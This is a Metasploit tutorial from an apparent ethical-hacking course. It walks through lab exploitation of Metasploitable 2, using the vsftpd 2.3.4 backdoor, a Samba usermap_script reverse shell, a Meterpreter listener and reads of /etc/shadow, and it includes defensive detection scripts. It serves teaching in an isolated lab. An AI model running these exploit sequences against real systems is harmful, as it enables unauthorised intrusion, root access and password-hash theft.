⚠️ Authorised Lab Use Only: Metasploit Framework must only be used against systems you own or have explicit written authorisation to test. All exercises in this guide target Metasploitable 2 running in your isolated home lab — never a production system. Using Metasploit against unauthorised targets is illegal under the Computer Misuse Act, CFAA, and equivalent laws globally.
On Day 9 we collected intelligence — emails, subdomains, IP ranges — using theHarvester. Today we take the next step in the attack chain and learn what to do with that intelligence. Metasploit Framework is the tool that bridges the gap between “I know this system is vulnerable” and “I have a shell on it.” It is the most widely used penetration testing platform on the planet, and by the end of this Metasploit tutorial you will have run your first real exploit and caught your first Meterpreter session in your own lab.
🎯 What You’ll Master in Day 10
Navigate msfconsole and understand the Metasploit module architecture
Search, select, configure and launch exploit modules with correct payloads
Catch and interact with a Meterpreter session in your Metasploitable lab
Use core post-exploitation Meterpreter commands for system information gathering
Understand how auxiliary scanner modules work independently of exploits
⏱️ 26 min read · 3 hands-on exercises
Yesterday on Day 9 we used theHarvester for passive OSINT reconnaissance, building a complete intelligence picture of a target from public sources. Today we shift from intelligence gathering to active exploitation. Metasploit Framework is what professional penetration testers reach for when they have identified a vulnerable service and need to demonstrate real impact — and it lives in the 180-Day Kali Linux Mastery Course as one of the most important tool days in the entire first month.
What Is Metasploit Framework and How It Fits the Attack Chain
Metasploit Framework (MSF) is an open-source penetration testing platform originally created by HD Moore in 2003 and now maintained by Rapid7. It contains over 2,200 exploit modules covering vulnerabilities across Windows, Linux, macOS, network devices, web applications, and more. Every module is purpose-built, well-documented, and follows a consistent interface — meaning once you learn to use one exploit, you know how to use all of them.
In the attack chain context, Metasploit sits at Step 3 — exploitation. You use reconnaissance tools like Nmap and theHarvester to identify targets and services, then Metasploit to exploit the identified vulnerability and gain initial access. Everything that follows — post-exploitation, pivoting, persistence — also has dedicated Metasploit modules to support it. It is truly an end-to-end platform, not just an exploit launcher.
📸 msfconsole loading in Kali Linux 2026 — the ASCII banner confirms the current version and total module count. Over 2,377 exploit modules available out of the box.
💡 Why Metasploit Is Standard: Metasploit is the tool that professional penetration testers reference in every report and every OSCP exam attempt. Understanding its architecture deeply — not just running random exploits — is what separates a professional from a script kiddie. This tutorial builds that deep understanding from the ground up.
🧠 EXERCISE 1 — THINK LIKE A HACKER (2 MIN · NO TOOLS)
Why is Metasploit more than just an exploit launcher?
⏱️ Time: 2 minutes · No tools required
Before running a single Metasploit command, think through this question to build the right mental model:
A penetration tester has found an unpatched vsftpd 2.3.4 service on a target.
They could:
A) Manually write exploit code from scratch
B) Download a PoC from Exploit-DB and adapt it
C) Use the Metasploit module for vsftpd_234_backdoor
Question: When is C the right choice, and when would a professional
prefer A or B? What are the trade-offs of each approach in terms of:
– Speed and efficiency
– Detection by EDR/AV solutions
– Documentation and reproducibility
– Learning depth vs operational effectiveness
✅ What you just learned: Metasploit is the right choice when speed, documentation, and a proven reliable exploit are priorities — which covers 90% of authorised penetration tests. Manual exploitation becomes important when EDR evasion is required, when you need to understand the vulnerability deeply, or when no Metasploit module exists. Professionals use both — knowing when to use each is the skill.
📸 Write your answer and share it in #day10-mindset on Discord. Tag #metasploitday10
🧠 QUICK CHECK — Section 1
In the penetration testing attack chain, where does Metasploit primarily sit?
msfconsole Basics — Navigation, Help and Essential Commands
msfconsole is the primary Metasploit interface. It is a command-line console with tab-completion, command history, and a context-sensitive help system. Learning the core navigation commands takes about ten minutes — after that, the interface gets out of your way and lets you focus on the work.
MSFCONSOLE — ESSENTIAL NAVIGATION COMMANDS
# Launch Metasploit
msfconsole
# Faster start (skip banner, load database):
msfconsole -q
# ─── INSIDE MSFCONSOLE ───
# Get help on any command
help
help search
# Search for modules by keyword, CVE, platform, type
back    # unload current module, return to msf6 prompt
exit    # exit msfconsole
💡 Tab Completion is Your Best Friend: In msfconsole, pressing Tab after any partial command or module name auto-completes it. Type use exploit/unix/ then Tab twice to see all unix exploits. This is far faster than typing full module paths and essential for efficient workflow.
The Module Architecture — Exploits, Auxiliaries, Payloads, Post
Every piece of functionality in Metasploit is packaged as a module. There are six module types and understanding what each does tells you exactly which type to reach for in any given situation.
Metasploit Module Architecture — 6 Types
💥 exploit/
Takes advantage of a specific vulnerability. Always paired with a payload. Ranked: Excellent / Great / Good / Normal / Average / Low.
exploit/unix/ftp/vsftpd_234_backdoor
🔍 auxiliary/
Scanners, fuzzers, sniffers, brute forcers — no payload needed. Used for reconnaissance and enumeration.
auxiliary/scanner/portscan/tcp
📦 payload/
Code that runs after a successful exploit. Defines what happens with your access: shell, Meterpreter, command execution.
payload/linux/x86/meterpreter/reverse_tcp
🔧 post/
Post-exploitation modules. Run after getting a shell: privilege escalation, credential harvesting, pivoting setup.
post/multi/recon/local_exploit_suggester
🎭 encoder/
Transforms payloads to avoid signature detection. Used with msfvenom for standalone payload generation.
encoder/x86/shikata_ga_nai
🛡️ evasion/
Generates payloads designed to bypass specific AV/EDR products. More advanced than encoders.
evasion/windows/windows_defender_exe
📸 Metasploit’s six module types — exploits need payloads, auxiliaries work standalone, post modules run after access is established. Understanding this architecture tells you exactly which type to search for in any scenario.
🧠 QUICK CHECK — Section 3
Which Metasploit module type would you use to run an SSH brute force scan without exploiting anything?
Your First Exploit — vsftpd 2.3.4 Against Metasploitable
Metasploitable 2 is an intentionally vulnerable Linux VM designed specifically for Metasploit practice. It runs multiple vulnerable services — including vsftpd 2.3.4, which contains a backdoor deliberately inserted by an attacker who compromised the vsftpd source code in 2011. This makes it a safe, legal, and reliable target for your first Metasploit exploit in your home lab.
⚠️ Lab Network Only: Metasploitable 2 must always run on a host-only or isolated network — never connected to the internet. Its vulnerabilities are real and exploitable. Download from: sourceforge.net/projects/metasploitable/ and configure VirtualBox to use a host-only network only.
YOUR FIRST EXPLOIT — vsftpd 2.3.4 BACKDOOR
# STEP 1 — Confirm Metasploitable is running and reachable
ping 192.168.56.101    # replace with your Metasploitable IP
Run the vsftpd exploit and confirm root access on Metasploitable 2
⏱️ Time: 15 minutes · Target: Metasploitable 2 on your host-only network
Follow the exploit sequence above exactly. The goal is not just to run the commands — it is to understand what each step does and why the vsftpd backdoor exists.
FULL EXPLOIT SEQUENCE WITH VERIFICATION
# Complete sequence — replace IP with your Metasploitable IP
nmap -sV -p 21 192.168.56.101
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.101
run
id && whoami && cat /etc/passwd | head -5
# Document: what UID are you? What does that mean for access?
# After confirming root — try these commands to explore:
cat /etc/shadow | head -5    # password hashes
ls /root                     # root’s home directory
ifconfig                     # network interfaces
ps aux | head -20            # running processes
✅ What you just learned: A single Metasploit module, configured with one option (RHOSTS), delivered root access to a vulnerable system in under 30 seconds. The vsftpd 2.3.4 backdoor is a real CVE (CVE-2011-2523) that was present in production deployments before being discovered. This is why patch management matters — and why penetration testers check service version numbers so carefully during reconnaissance.
📸 Screenshot your id command showing uid=0(root) and share in #day10-exercise on Discord.
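The version check described above, seen from the patch-management side: this added example (not part of the original tutorial) parses Nmap grepable output and flags services whose banner matches a watchlist. The scan text and the second host 192.168.56.102 are constructed samples, and the watchlist holds only the vsftpd entry named on this page.

```python
import re

# Watchlist of (product, exact version) -> advisory note.
# The single entry comes from this page; extend it from your own advisories.
WATCHLIST = {
    ("vsftpd", "2.3.4"): "CVE-2011-2523 (backdoored release)",
}

# Constructed sample of `nmap -sV -oG -` output (not a real scan).
SAMPLE_GNMAP = (
    "# Nmap scan initiated (constructed sample)\n"
    "Host: 192.168.56.101 ()\tStatus: Up\n"
    "Host: 192.168.56.101 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, "
    "23/closed/tcp//telnet///\n"
    "Host: 192.168.56.102 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.5/\n"
)

HOST_RE = re.compile(r"^Host:\s+(\S+)")


def parse_gnmap(text):
    """Yield (host, port, proto, service, version) for every open port."""
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m or "\tPorts: " not in line:
            continue  # comment lines and "Status:" lines carry no port data
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            # Grepable fields: port/state/proto/owner/service/rpcinfo/version/
            fields = entry.strip().split("/")
            if len(fields) < 7 or fields[1] != "open":
                continue
            yield m.group(1), int(fields[0]), fields[2], fields[4], fields[6]


def flag_watchlisted(text, watchlist=WATCHLIST):
    """Return (host, port, banner, note) for banners on the watchlist."""
    findings = []
    for host, port, _proto, _service, version in parse_gnmap(text):
        tokens = version.split()
        # Match on product name plus exact version, the first two banner tokens.
        if len(tokens) >= 2 and (tokens[0], tokens[1]) in watchlist:
            note = watchlist[(tokens[0], tokens[1])]
            findings.append((host, port, version, note))
    return findings


if __name__ == "__main__":
    for host, port, banner, note in flag_watchlisted(SAMPLE_GNMAP):
        print(f"{host}:{port} {banner} -> {note}")
```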
Meterpreter — The Advanced Shell That Stays in Memory
The vsftpd exploit gives you a basic command shell. For professional penetration testing, Meterpreter is the payload of choice — it provides a far richer post-exploitation environment, runs entirely in memory (never writes to disk), encrypts its communications, and supports dozens of built-in post-exploitation commands without requiring additional tools on the target.
GETTING A METERPRETER SESSION — SAMBA EXPLOIT
# Use the Samba usermap_script exploit on Metasploitable; the cmd/unix/reverse payload set below returns a command shell
search type:exploit name:samba usermap_script
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.101
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.1    # your Kali IP
run
# For a full Meterpreter session, use multi/handler with a listener:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 4444
run -j    # run as background job, waiting for connections
📸 Meterpreter session open against Metasploitable — sysinfo confirms target OS, getuid confirms root access, hashdump retrieves all password hashes for offline cracking
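From the monitoring side, the reverse payloads and the LPORT 4444 listener configured above appear as a connection initiated by the server itself. This added example (not part of the original tutorial) flags such unexpected egress in flow records; the flow-record format, the resolver address 192.168.56.2 and the allowlist are assumptions constructed for illustration.

```python
import ipaddress

# Assumed lab layout (from this page's examples): the server is 192.168.56.101.
SERVERS = {ipaddress.ip_address("192.168.56.101")}

# Assumed egress allowlist: (destination network, destination port) pairs the
# server legitimately initiates, here DNS and NTP to a hypothetical resolver.
EGRESS_ALLOW = [
    (ipaddress.ip_network("192.168.56.2/32"), 53),
    (ipaddress.ip_network("192.168.56.2/32"), 123),
]

# Constructed flow records: "time initiator_ip:port > responder_ip:port proto"
SAMPLE_FLOWS = """\
10:01:02 192.168.56.1:51514 > 192.168.56.101:21 tcp
10:01:03 192.168.56.101:40112 > 192.168.56.2:53 udp
10:01:05 192.168.56.1:40233 > 192.168.56.101:139 tcp
10:01:06 192.168.56.101:36844 > 192.168.56.1:4444 tcp
malformed line
"""


def split_endpoint(endpoint):
    """Split 'ip:port' into (ip_address, int); raises ValueError if invalid."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host), int(port)


def parse_flow(line):
    """Parse one flow record; return None for lines that do not fit the format."""
    parts = line.split()
    if len(parts) != 5 or parts[2] != ">":
        return None
    try:
        src, _sport = split_endpoint(parts[1])
        dst, dport = split_endpoint(parts[3])
    except ValueError:
        return None
    return {"time": parts[0], "src": src, "dst": dst, "dport": dport,
            "proto": parts[4]}


def unexpected_egress(text, servers=SERVERS, allow=EGRESS_ALLOW):
    """Return flows initiated by a server to a destination not on the allowlist."""
    alerts = []
    for line in text.splitlines():
        flow = parse_flow(line)
        if flow is None or flow["src"] not in servers:
            continue  # inbound client connections to the server are expected
        if any(flow["dst"] in net and flow["dport"] == port for net, port in allow):
            continue
        alerts.append(flow)
    return alerts
```

The rule keys on who initiated the connection and where it went, so it still fires if the listener port is something other than 4444.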
Auxiliary Modules — Scanning and Enumeration Without Exploiting
Auxiliary modules are often overlooked in favour of exploits, but they are among the most useful modules in Metasploit for professional assessments. They handle port scanning, service enumeration, brute forcing, vulnerability verification, and protocol fuzzing — all without needing a payload and without creating a session on the target.
🔥 EXERCISE 3 — KALI TERMINAL (METASPLOITABLE — AUXILIARY MODULES)
Run three auxiliary modules against Metasploitable and document the findings
⏱️ Time: 20 minutes · Target: Metasploitable 2 on your host-only network
Use auxiliary modules to enumerate the Metasploitable target without exploiting anything. This is the style of module used during the reconnaissance phase of a professional assessment.
THREE AUXILIARY MODULES — METASPLOITABLE LAB
# MODULE 1: TCP port scanner
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.56.101
set PORTS 1-1000
set THREADS 50
run
# Document: how many open ports found? Compare to your Nmap results.
# MODULE 2: SSH version scanner
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.56.101
run
# Document: what SSH version is running? Is it vulnerable?
# Document: SMB version, hostname, OS version, domain
# BONUS: Check for SMB vulnerabilities
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.56.101
run
# Is it vulnerable to EternalBlue?
✅ What you just learned: Auxiliary modules let you build a comprehensive target profile inside msfconsole without ever launching an exploit. This is the standard approach for the enumeration phase of a professional assessment — scan with auxiliaries, identify vulnerable services, then select the appropriate exploit module. The scan results also feed directly into your penetration test report.
📸 Screenshot your port scanner output listing open services and share in #day10-auxiliary on Discord. Tag #metasploitday10
🧠 QUICK CHECK — Section 6
What is the key difference between Meterpreter and a standard command shell?
📋 Commands Used Today — Day 10 Reference Card
msfconsole -q  # Launch Metasploit (quiet mode, no banner)
search type:exploit name:vsftpd  # Search modules by type and name keyword
use exploit/unix/ftp/vsftpd_234_backdoor  # Load the vsftpd backdoor exploit module
show options  # Display all configurable options for loaded module
set RHOSTS [IP]  # Set target host(s) — accepts IPs, ranges, CIDR
run / exploit  # Launch the configured module
sessions -i 1  # Interact with session number 1
sysinfo  # Meterpreter — OS, hostname, architecture info
background  # Background current session, return to msf6 prompt
use auxiliary/scanner/portscan/tcp  # TCP port scanner auxiliary module
❓ Frequently Asked Questions – Metasploit Tutorial Kali Linux 2026
What is Metasploit Framework?
Metasploit Framework is the world’s most widely used open-source penetration testing platform, containing over 2,200 exploit modules, auxiliary scanners, post-exploitation tools, and payload generators. It provides a consistent interface for finding and exploiting vulnerabilities in authorised targets. It comes pre-installed in Kali Linux and is used by professional penetration testers worldwide.
What is msfconsole?
msfconsole is the primary command-line interface for the Metasploit Framework. Launch it by running msfconsole in a Kali terminal. It provides tab-completion, command history, and context-sensitive help. All module loading, configuration, execution, and session management happens from within msfconsole.
What is the difference between an exploit and a payload in Metasploit?
An exploit is the code that takes advantage of a specific vulnerability to gain code execution. A payload is the code that runs after the exploit succeeds — it defines what your access looks like. Common payloads: reverse_tcp (target connects back to you), bind_tcp (you connect to a listener on the target), and Meterpreter (advanced in-memory shell with rich post-exploitation capabilities).
What is Metasploitable 2 and where do I get it?
Metasploitable 2 is an intentionally vulnerable Ubuntu Linux VM designed for Metasploit practice. It runs dozens of vulnerable services including vsftpd 2.3.4, Samba 3.x, PostgreSQL, Tomcat, and more. Download free from sourceforge.net/projects/metasploitable/. Always run it on a host-only network — never internet-connected.
Is Metasploit legal to use?
Metasploit is legal for authorised penetration testing, CTF competitions, security research, and practising in your own lab. Using it against systems you do not own or have explicit written permission to test is illegal. Always ensure you have written authorisation and scope documentation before using any offensive tool against any target.
What comes after Metasploit in this course?
Day 11 covers Aircrack-ng — WiFi password cracking and WPA2 handshake capture. The Metasploit skills from Day 10 are revisited extensively in Day 38 (Metasploit Advanced) and throughout the post-exploitation section of the course from Days 25–35 of the Ethical Hacking course track.
Mr Elite
Owner, SecurityElites.com
I remember the exact moment I ran my first Metasploit exploit successfully — the green text scrolling, the shell prompt appearing, running id and seeing uid=0(root). It was a completely different kind of learning from reading about vulnerabilities. That tactile moment of actually landing a shell is what converts theory into real skill. I designed this entire 180-day course to give every student that same progression — starting here with Metasploit fundamentals and building methodically through post-exploitation, pivoting, and advanced techniques over the weeks that follow.